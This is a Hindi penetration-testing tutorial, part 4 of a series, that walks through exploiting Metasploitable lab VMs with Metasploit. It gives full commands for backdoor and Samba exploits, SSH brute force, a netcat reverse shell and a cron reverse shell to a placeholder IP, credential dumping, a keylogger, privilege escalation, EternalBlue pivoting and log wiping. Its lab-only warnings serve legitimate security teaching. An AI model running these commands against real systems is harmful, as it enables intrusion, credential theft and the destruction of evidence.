हैकर का रास्ता: 5 भागों की श्रृंखला
भाग 1: परिचय → भाग 2: Flipper में महारत → भाग 3: Kali की बुनियादी बातें → भाग 4: Exploitation → भाग 5: पूर्ण ऑडिट
भाग 1-3 में, आपने अपना टूलकिट बनाया। आप बैज क्लोन कर सकते हैं, नेटवर्क मैप कर सकते हैं, handshake कैप्चर कर सकते हैं, और किसी लक्ष्य पर चल रही हर सेवा की पहचान कर सकते हैं। अब आपको हर जगह कमज़ोरियाँ दिखती हैं। लेकिन कमज़ोरी देखना और उसका फ़ायदा उठाना बहुत अलग कौशल हैं।
यहीं से चीज़ें असली हो जाती हैं। आज आप Metasploit Framework का उपयोग करना सीखेंगे, वही टूल जो दुनिया भर के पेशेवर penetration tester इस्तेमाल करते हैं। आप अपनी पहली कमज़ोरी का फ़ायदा उठाएंगे, persistence स्थापित करेंगे, विशेषाधिकार बढ़ाएंगे, और नेटवर्क के ज़रिए pivot करना सीखेंगे।
वह रेखा जो आपको पार नहीं करनी चाहिए
इस लेख में सब कुछ केवल उन सिस्टम पर अभ्यास किया जाना चाहिए जो आपके हैं या जिन्हें परीक्षण करने की आपके पास स्पष्ट लिखित अनुमति है। कंप्यूटर सिस्टम तक अनधिकृत पहुंच एक संघीय अपराध है जिसमें 20 साल तक की कैद की सज़ा हो सकती है। "मैं बस सीख रहा था" कोई बचाव नहीं है। एक लैब बनाएं, जानबूझकर कमज़ोर VMs का उपयोग करें, और कभी भी ऐसे सिस्टम को न छुएं जो आपके नहीं हैं।
भाग 1: अपनी अटैक लैब बनाना
किसी भी चीज़ का exploitation करने से पहले, आपको लक्ष्य चाहिए। असली penetration tester जानबूझकर कमज़ोर मशीनों के साथ अलग लैब वातावरण का उपयोग करते हैं। आप भी यही करेंगे।
आवश्यक लैब सेटअप
आपको क्या चाहिए
- Kali Linux VM - आपकी अटैक मशीन (भाग 3 से)
- Metasploitable 2 - जानबूझकर कमज़ोर Linux VM (SourceForge)
- Metasploitable 3 - कमज़ोर Windows/Linux VM (GitHub)
- DVWA - Damn Vulnerable Web Application (GitHub)
- VulnHub VMs - CTF-स्टाइल कमज़ोर मशीनें (vulnhub.com)
प्रोजेक्ट: लैब नेटवर्क सेटअप
समय: 45 मिनट
- SourceForge से Metasploitable 2 डाउनलोड करें
- VirtualBox/VMware में इम्पोर्ट करें
- नेटवर्क कॉन्फ़िगर करें: Kali और Metasploitable दोनों को "Host-Only" या "Internal Network" पर सेट करें
- Metasploitable बूट करें (डिफ़ॉल्ट लॉगिन:
msfadmin/msfadmin) - IP पता नोट करें:
ifconfig - Kali से, कनेक्टिविटी सत्यापित करें:
ping METASPLOITABLE_IP - प्रारंभिक स्कैन चलाएं:
sudo nmap -sV -sC METASPLOITABLE_IP
सत्यापन: आपको दर्जनों खुले पोर्ट दिखने चाहिए। Metasploitable को हैक होने के लिए डिज़ाइन किया गया है।
Metasploitable का आपका nmap स्कैन FTP, SSH, Telnet, SMTP, HTTP, Samba, MySQL, PostgreSQL, और अन्य जैसी सेवाओं को प्रकट करेगा, जिनमें से कई पुराने, कमज़ोर संस्करण चला रहे हैं। यह आपका खेल का मैदान है।
भाग 2: Metasploit Framework की बुनियादी बातें
Metasploit सिर्फ़ एक टूल नहीं है। यह एक पूरा इकोसिस्टम है। इसमें हज़ारों exploits, payloads, सहायक modules, और post-exploitation टूल्स हैं। इसकी संरचना को समझना आवश्यक है।
Metasploit शुरू करना
1# Initialize the database (first time only)
2sudo msfdb init
3
4# Start Metasploit console
5msfconsole
6
7# You'll see the Metasploit banner and prompt:
8msf6 >Metasploit की संरचना
Metasploit सब कुछ modules में व्यवस्थित करता है:
- Exploits - कोड जो कमज़ोरियों का फ़ायदा उठाता है
- Payloads - कोड जो exploitation के बाद चलता है (shells, meterpreter)
- Auxiliary - स्कैनर, fuzzers, और अन्य उपयोगिताएं
- Post - persistence, pivoting के लिए post-exploitation modules
- Encoders - पहचान से बचने के लिए payloads को अस्पष्ट करना
1# Search for modules
2msf6 > search type:exploit platform:linux smb
3
4# Search by CVE
5msf6 > search cve:2017-0144
6
7# Search by name
8msf6 > search vsftpd
9
10# Get info about a module
11msf6 > info exploit/unix/ftp/vsftpd_234_backdoorExploitation का वर्कफ़्लो
हर Metasploit exploitation एक ही पैटर्न का पालन करता है:
- एक exploit चुनें -
use exploit/path/to/module - विकल्प सेट करें - लक्ष्य IP, पोर्ट, credentials
- एक payload चुनें - exploitation के बाद क्या चलेगा
- निष्पादित करें -
exploitयाrun
भाग 3: आपका पहला Exploit
चलिए इतिहास के सबसे प्रसिद्ध backdoors में से एक का फ़ायदा उठाते हैं: vsftpd 2.3.4 backdoor। 2011 में, किसी ने vsftpd सोर्स कोड में एक backdoor डाला। अगर आप :) से समाप्त होने वाला username भेजते हैं, तो पोर्ट 6200 पर एक shell खुलता है।
Metasploitable 2 बिल्कुल यही संस्करण चलाता है।
1# Start Metasploit
2msfconsole
3
4# Search for the exploit
5msf6 > search vsftpd
6
7# Select the exploit
8msf6 > use exploit/unix/ftp/vsftpd_234_backdoor
9
10# View required options
11msf6 exploit(unix/ftp/vsftpd_234_backdoor) > show options
12
13# Set the target
14msf6 exploit(...) > set RHOSTS 192.168.56.101
15
16# Run the exploit
17msf6 exploit(...) > exploit
18
19# If successful:
20[*] Command shell session 1 opened
21[+] Got shell!
22
23# You now have a root shell on the target
24whoami
25root
26id
27uid=0(root) gid=0(root)बस इतना ही। एक कमज़ोर सेवा, एक exploit, root एक्सेस। इसीलिए सॉफ़्टवेयर अपडेट रखना ज़रूरी है।
प्रोजेक्ट: vsftpd Backdoor का Exploit
समय: 15 मिनट
पूर्वापेक्षाएं: Metasploitable 2 चल रहा हो, Kali उसी नेटवर्क पर हो
- सत्यापित करें कि FTP चल रहा है:
nmap -sV -p 21 TARGET_IP - msfconsole लॉन्च करें
- vsftpd exploit खोजें, चुनें और कॉन्फ़िगर करें
- Exploit चलाएं
- Shell मिलने पर, खोजें:
cat /etc/shadow
सफलता का मापदंड: आप /etc/shadow पढ़ सकते हैं, जिसे केवल root एक्सेस कर सकता है।
भाग 4: Payloads को समझना
Payload वह है जो exploit सफल होने के बाद चलता है। ऊपर जो बुनियादी shell हमें मिला वह सरल है, लेकिन Metasploit बहुत अधिक शक्तिशाली विकल्प प्रदान करता है।
Payload के प्रकार
- Singles - स्वयंपूर्ण, एक बार के payloads (उपयोगकर्ता जोड़ना, कमांड चलाना)
- Stagers - छोटे payloads जो कनेक्शन स्थापित करते हैं, फिर मुख्य payload डाउनलोड करते हैं
- Stages - stager द्वारा डाउनलोड किया गया मुख्य payload (Meterpreter)
1# List compatible payloads for current exploit
2msf6 exploit(...) > show payloads
3
4# Set a specific payload
5msf6 exploit(...) > set PAYLOAD linux/x86/meterpreter/reverse_tcp
6
7# Payload naming convention:
8# platform/arch/payload_type/connection_type
9# linux/x86/meterpreter/reverse_tcp
10# windows/x64/shell/bind_tcpReverse बनाम Bind Shells
- Reverse shell - लक्ष्य आपसे वापस कनेक्ट होता है। Firewalls को बायपास करने के लिए बेहतर (आउटबाउंड आमतौर पर अनुमत)।
- Bind shell - लक्ष्य एक पोर्ट खोलता है जिससे आप कनेक्ट होते हैं। पहचानना आसान, अक्सर firewalls द्वारा ब्लॉक किया जाता है।
1# For reverse shells, you must set your IP
2msf6 exploit(...) > set LHOST YOUR_KALI_IP
3msf6 exploit(...) > set LPORT 4444
4
5# Metasploit starts a listener automatically when you exploitMeterpreter: सर्वोत्तम Payload
Meterpreter, Metasploit का सबसे शक्तिशाली payload है। यह पूरी तरह मेमोरी में चलता है (डिस्क पर कोई फ़ाइल नहीं), एन्क्रिप्टेड संचार प्रदान करता है, और post-exploitation के लिए दर्जनों बिल्ट-इन कमांड शामिल हैं।
1# Meterpreter commands (once you have a session)
2meterpreter > sysinfo # System information
3meterpreter > getuid # Current user
4meterpreter > pwd # Current directory
5meterpreter > ls # List files
6meterpreter > download file # Download file to Kali
7meterpreter > upload file # Upload file to target
8meterpreter > shell # Drop to system shell
9meterpreter > hashdump # Dump password hashes
10meterpreter > screenshot # Take screenshot
11meterpreter > keyscan_start # Start keylogger
12meterpreter > keyscan_dump # Dump keystrokes
13meterpreter > background # Background this sessionभाग 5: और Exploitation तकनीकें
Samba (SMB) का Exploitation
Metasploitable 2 Samba का एक कमज़ोर संस्करण चलाता है। यह WannaCry में उपयोग किए गए कुख्यात EternalBlue exploit के समान है।
1# Search for Samba exploits
2msf6 > search type:exploit samba
3
4# The "username map script" vulnerability
5msf6 > use exploit/multi/samba/usermap_script
6msf6 exploit(...) > set RHOSTS TARGET_IP
7msf6 exploit(...) > set PAYLOAD cmd/unix/reverse
8msf6 exploit(...) > set LHOST YOUR_IP
9msf6 exploit(...) > exploit
10
11[*] Command shell session 2 openedकमज़ोर Credentials का Exploitation
हर हमले के लिए सॉफ़्टवेयर कमज़ोरी की ज़रूरत नहीं होती। कमज़ोर पासवर्ड हर जगह हैं।
1# SSH brute-force auxiliary module
2msf6 > use auxiliary/scanner/ssh/ssh_login
3msf6 auxiliary(...) > set RHOSTS TARGET_IP
4msf6 auxiliary(...) > set USERNAME root
5msf6 auxiliary(...) > set PASS_FILE /usr/share/wordlists/rockyou.txt
6msf6 auxiliary(...) > set STOP_ON_SUCCESS true
7msf6 auxiliary(...) > run
8
9# For known credentials
10msf6 > use auxiliary/scanner/ssh/ssh_login
11msf6 auxiliary(...) > set USERNAME msfadmin
12msf6 auxiliary(...) > set PASSWORD msfadmin
13msf6 auxiliary(...) > run
14
15[+] 192.168.56.101:22 - Success: 'msfadmin:msfadmin'वेब एप्लिकेशन Exploitation
Metasploitable में कई कमज़ोर वेब एप्लिकेशन शामिल हैं। चलिए एक PHP code injection का फ़ायदा उठाते हैं।
1# First, browse to http://TARGET/mutillidae/
2# Find the "User Lookup" page (vulnerable to SQLi and code injection)
3
4# Use Metasploit's web exploits
5msf6 > search type:exploit php
6
7# Or exploit manually with command injection:
8# In vulnerable input field:
9; cat /etc/passwd
10; nc -e /bin/bash YOUR_IP 4444प्रोजेक्ट: तीन अलग-अलग सेवाओं का Exploit
समय: 60 मिनट
लक्ष्य: Metasploitable 2
- vsftpd backdoor (FTP - पोर्ट 21) का exploit करें और root shell प्राप्त करें
- Samba usermap_script (SMB - पोर्ट 139/445) का exploit करें और root shell प्राप्त करें
- auxiliary/scanner/ssh/ssh_login का उपयोग करके SSH credentials क्रैक करें
- हर exploitation का दस्तावेज़ीकरण करें: उपयोग किया गया module, सेट किए गए विकल्प, परिणाम
बोनस: पोर्ट 80 पर वेब एप्लिकेशन की जांच करें और मैन्युअल exploitation वेक्टर खोजें।
भाग 6: Post-Exploitation
Shell मिलना बस शुरुआत है। असली penetration test में यह प्रदर्शित करना होता है कि एक हमलावर उस एक्सेस के साथ क्या कर सकता है। यह post-exploitation है।
जानकारी एकत्र करना
1# From a Meterpreter session
2meterpreter > sysinfo
3Computer : metasploitable
4OS : Linux 2.6.24
5Architecture: i686
6Meterpreter : x86/linux
7
8# Network information
9meterpreter > ipconfig
10meterpreter > route
11meterpreter > arp1# From a regular shell
2cat /etc/passwd # All users
3cat /etc/shadow # Password hashes (requires root)
4cat /etc/hosts # Network mappings
5netstat -tulpn # Open ports
6ps aux # Running processes
7crontab -l # Scheduled tasksCredential Harvesting
1# Dump password hashes
2meterpreter > hashdump
3root:$1$XtqVHIvN$0MnR7..........:0:0:root:/root:/bin/bash
4msfadmin:$1$XN10Zj2c$Rt/zzC........:1000:1000::/home/msfadmin:/bin/bash1# Or from shell
2cat /etc/shadow
3
4# Crack hashes offline with John the Ripper
5john --wordlist=/usr/share/wordlists/rockyou.txt hashes.txt
6
7# Or hashcat (faster with GPU)
8hashcat -m 500 hashes.txt /usr/share/wordlists/rockyou.txtPersistence स्थापित करना
Persistence का मतलब है रीबूट के बाद भी या जब आपका शुरुआती exploit वेक्टर पैच हो जाए तब भी एक्सेस बनाए रखना।
1# Add a new user with sudo access
2useradd -m -s /bin/bash hacker
3echo "hacker:password123" | chpasswd
4usermod -aG sudo hacker
5
6# Add SSH key for passwordless access
7mkdir /home/hacker/.ssh
8echo "YOUR_PUBLIC_KEY" >> /home/hacker/.ssh/authorized_keys
9
10# Cron-based reverse shell (reconnects every minute)
11echo "* * * * * /bin/bash -c 'bash -i >& /dev/tcp/YOUR_IP/4444 0>&1'" >> /var/spool/cron/crontabs/root
12
13# Metasploit persistence module
14meterpreter > run persistence -h
15meterpreter > run persistence -X -i 60 -p 4444 -r YOUR_IPPersistence = सबूत
हर persistence मैकेनिज़म निशान छोड़ता है। असली penetration test में, आप दस्तावेज़ करते हैं कि आप क्या कर सकते थे, फिर सफ़ाई करते हैं। क्लाइंट सिस्टम पर backdoors छोड़ना अव्यवसायिक और संभावित रूप से अवैध है। अपनी लैब में, मनमर्ज़ी करें, लेकिन परिणामों को समझें।
भाग 7: विशेषाधिकार वृद्धि
अक्सर आपको कम विशेषाधिकार वाले उपयोगकर्ता के रूप में शुरुआती एक्सेस मिलता है। परीक्षण उद्देश्यों को प्राप्त करने के लिए root/admin तक वृद्धि आमतौर पर आवश्यक है।
Linux विशेषाधिकार वृद्धि
1# Current user context
2id
3whoami
4
5# SUID binaries (run as owner regardless of who executes)
6find / -perm -4000 -type f 2>/dev/null
7
8# World-writable directories
9find / -writable -type d 2>/dev/null
10
11# Sudo permissions
12sudo -l
13
14# Kernel version (for kernel exploits)
15uname -a
16
17# Running processes as root
18ps aux | grep root
19
20# Cron jobs
21cat /etc/crontab
22ls -la /etc/cron.*स्वचालित Enumeration Scripts
- LinPEAS - github.com/carlospolop/PEASS-ng
- LinEnum - github.com/rebootuser/LinEnum
- linux-exploit-suggester - GitHub
1# Upload and run LinPEAS
2# From Kali, host the script:
3python3 -m http.server 8000
4
5# From target:
6wget http://YOUR_IP:8000/linpeas.sh
7chmod +x linpeas.sh
8./linpeas.sh
9
10# LinPEAS highlights potential vectors in colors:
11# RED/YELLOW = Critical findings, likely exploitableसामान्य Linux Privesc वेक्टर
1# 1. Sudo misconfiguration
2sudo -l
3# If you see: (ALL) NOPASSWD: /usr/bin/vim
4sudo vim -c '!sh'
5# Instant root shell
6
7# 2. SUID binary exploitation
8# If /usr/bin/find has SUID bit:
9find . -exec /bin/sh -p \;
10
11# 3. Writable /etc/passwd
12# Generate password hash:
13openssl passwd -1 mypassword
14# Add to /etc/passwd:
15echo 'hacker:$1$xyz$...:0:0:root:/root:/bin/bash' >> /etc/passwd
16
17# 4. Cron job exploitation
18# If a cron runs a writable script as root:
19echo 'chmod +s /bin/bash' >> /path/to/cron/script
20# Wait for cron, then:
21/bin/bash -p
22# Root shellWindows विशेषाधिकार वृद्धि
अगर आप Windows लक्ष्यों (Metasploitable 3) का परीक्षण कर रहे हैं, तो तकनीकें अलग हैं:
1# From Meterpreter on Windows
2meterpreter > getuid
3Server username: VICTIM\lowpriv_user
4
5meterpreter > getsystem
6[+] ...got SYSTEM
7
8# If getsystem fails, try:
9meterpreter > run post/multi/recon/local_exploit_suggester
10
11# Or background and use specific exploit:
12meterpreter > background
13msf6 > use exploit/windows/local/ms16_032_secondary_logon_handle_privesc
14msf6 exploit(...) > set SESSION 1
15msf6 exploit(...) > exploitप्रोजेक्ट: उपयोगकर्ता से Root तक वृद्धि
समय: 45 मिनट
परिदृश्य: आपके पास Metasploitable पर msfadmin (non-root) के रूप में SSH एक्सेस है
- Metasploitable पर SSH:
ssh msfadmin@TARGET - पुष्टि करने के लिए
idचलाएं कि आप root नहीं हैं - Sudo अनुमतियाँ जांचें:
sudo -l - SUID binaries खोजें:
find / -perm -4000 2>/dev/null - LinPEAS अपलोड करें और चलाएं
- एक privesc वेक्टर पहचानें और उसका फ़ायदा उठाएं
लक्ष्य: नेटवर्क सेवा के exploitation के अलावा किसी और चीज़ का उपयोग करके root shell प्राप्त करें।
भाग 8: Pivoting
Pivoting एक हैक किए गए सिस्टम का उपयोग करके अन्य सिस्टम पर हमला करना है जो आपकी अटैक मशीन से सीधे पहुंच योग्य नहीं हैं। इसी तरह हमलावर नेटवर्क में लैटरली मूव करते हैं।
Pivot परिदृश्य
इस नेटवर्क की कल्पना करें:
- आपका Kali: 192.168.1.100
- हैक किया गया host: 192.168.1.50 (आंतरिक नेटवर्क 10.0.0.0/24 से भी जुड़ा)
- लक्ष्य: 10.0.0.10 (केवल 192.168.1.50 से पहुंच योग्य)
आप 10.0.0.10 तक सीधे नहीं पहुंच सकते। लेकिन हैक किए गए host के माध्यम से, आप पहुंच सकते हैं।
Metasploit Routing
1# After getting a Meterpreter session on the pivot host
2meterpreter > ipconfig
3# Shows two interfaces: 192.168.1.50 and 10.0.0.50
4
5meterpreter > run autoroute -s 10.0.0.0/24
6[+] Added route to 10.0.0.0/24 via session 1
7
8meterpreter > background
9
10# Now Metasploit routes 10.0.0.0/24 traffic through session 1
11msf6 > route print
12
13# Scan the internal network
14msf6 > use auxiliary/scanner/portscan/tcp
15msf6 auxiliary(...) > set RHOSTS 10.0.0.1-254
16msf6 auxiliary(...) > set PORTS 22,80,443,445
17msf6 auxiliary(...) > run
18
19# Exploit internal targets through the pivot
20msf6 > use exploit/windows/smb/ms17_010_eternalblue
21msf6 exploit(...) > set RHOSTS 10.0.0.10
22msf6 exploit(...) > exploitपूर्ण एक्सेस के लिए SOCKS Proxy
1# Set up a SOCKS proxy through Meterpreter
2msf6 > use auxiliary/server/socks_proxy
3msf6 auxiliary(...) > set SRVPORT 1080
4msf6 auxiliary(...) > run
5
6# Configure proxychains (/etc/proxychains4.conf)
7socks5 127.0.0.1 1080
8
9# Now any tool can access the internal network
10proxychains nmap -sT -Pn 10.0.0.10
11proxychains curl http://10.0.0.10
12proxychains ssh [email protected]SSH Tunneling (Metasploit के बिना)
1# Dynamic port forwarding (SOCKS proxy)
2ssh -D 1080 user@pivot_host
3
4# Local port forwarding (specific port)
5ssh -L 8080:10.0.0.10:80 user@pivot_host
6# Now localhost:8080 reaches 10.0.0.10:80
7
8# Remote port forwarding (expose your service to internal network)
9ssh -R 4444:localhost:4444 user@pivot_host
10# Internal hosts can reach your port 4444 via pivot_host:4444भाग 9: निशान मिटाना
पेशेवर penetration tester अपनी एक्सेस का दस्तावेज़ीकरण करते हैं लेकिन बाद में सफ़ाई करते हैं। यह समझना कि हमलावर कैसे निशान मिटाते हैं, घुसपैठ का पता लगाने में भी मदद करता है।
1# Clear bash history
2history -c
3cat /dev/null > ~/.bash_history
4
5# Clear auth logs (requires root)
6echo "" > /var/log/auth.log
7echo "" > /var/log/wtmp
8echo "" > /var/log/btmp
9
10# Remove specific log entries
11sed -i '/YOUR_IP/d' /var/log/auth.log
12
13# Timestomp (change file timestamps)
14touch -r /etc/passwd /path/to/your/file
15
16# Meterpreter
17meterpreter > clearev # Clear Windows event logs
18meterpreter > timestomp file -m "01/01/2020 12:00:00"असली कार्यों में: यह न करें
पेशेवर pentester अपनी एक्सेस का दस्तावेज़ीकरण करते हैं और अपने निष्कर्षों की रिपोर्ट करते हैं। वे उन्हें छुपाते नहीं। लॉग साफ़ करना उन सबूतों को नष्ट कर देता है जिनकी रक्षकों को हमले के रास्ते को समझने के लिए ज़रूरत होती है। इन तकनीकों का अभ्यास केवल अपने पृथक लैब वातावरण में करें।
हैकर का रास्ता
5 भागों की श्रृंखला जो आपको जिज्ञासु से सक्षम बनाती है।
भाग 1: परिचय भाग 2: Flipper में महारत भाग 3: Kali की बुनियादी बातें भाग 4: Exploitation ✓ भाग 5: पूर्ण ऑडिट
भाग 4 चेकलिस्ट
☐ लैब सेटअप: Metasploitable 2 चल रहा, पृथक नेटवर्क कॉन्फ़िगर किया गया
☐ Metasploit: डेटाबेस आरंभ किया, बुनियादी नेविगेशन में महारत
☐ पहला Exploit: vsftpd backdoor का exploit किया, root shell प्राप्त किया
☐ कई वेक्टर: FTP, SMB exploit और SSH credentials क्रैक किए
☐ Post-Exploitation: Password hashes निकाले, सिस्टम की गणना की
☐ विशेषाधिकार वृद्धि: नेटवर्क exploit के बिना उपयोगकर्ता से root तक वृद्धि की
☐ Pivoting: autoroute और SOCKS proxy अवधारणाओं को समझा
☐ दस्तावेज़ीकरण: सभी exploits को चरणों और सबूतों के साथ दस्तावेज़ किया
आगे क्या है
आपने कमज़ोरियों का exploitation करना, विशेषाधिकार बढ़ाना, और नेटवर्क में pivot करना सीखा। आपने देखा कि कैसे एक कमज़ोरी कितनी तेज़ी से पूर्ण हमले में बदल जाती है। आप समझते हैं कि पेशेवर penetration tester क्या करते हैं।
भाग 5 में, हम सब कुछ एक साथ लाते हैं। आप शुरू से अंत तक एक पूर्ण सुरक्षा ऑडिट करेंगे:
- कार्यक्षेत्र और नियम
- पूर्ण reconnaissance कार्यप्रणाली
- व्यवस्थित exploitation
- व्यापक post-exploitation
- पेशेवर रिपोर्टिंग
- सुधार की सिफ़ारिशें
भाग 5 शिखर है। इस श्रृंखला में आपने जो कुछ सीखा वह एक वास्तविक दुनिया की कार्यप्रणाली में जुड़ता है जिसका उपयोग आप किसी भी अधिकृत नेटवर्क की सुरक्षा का मूल्यांकन करने के लिए कर सकते हैं।
आपने तकनीकें सीख लीं। अब आप कार्यप्रणाली सीखेंगे। भाग 5 कौशल को पूर्ण penetration testing वर्कफ़्लो में बदलता है।
भाग 5 में मिलते हैं।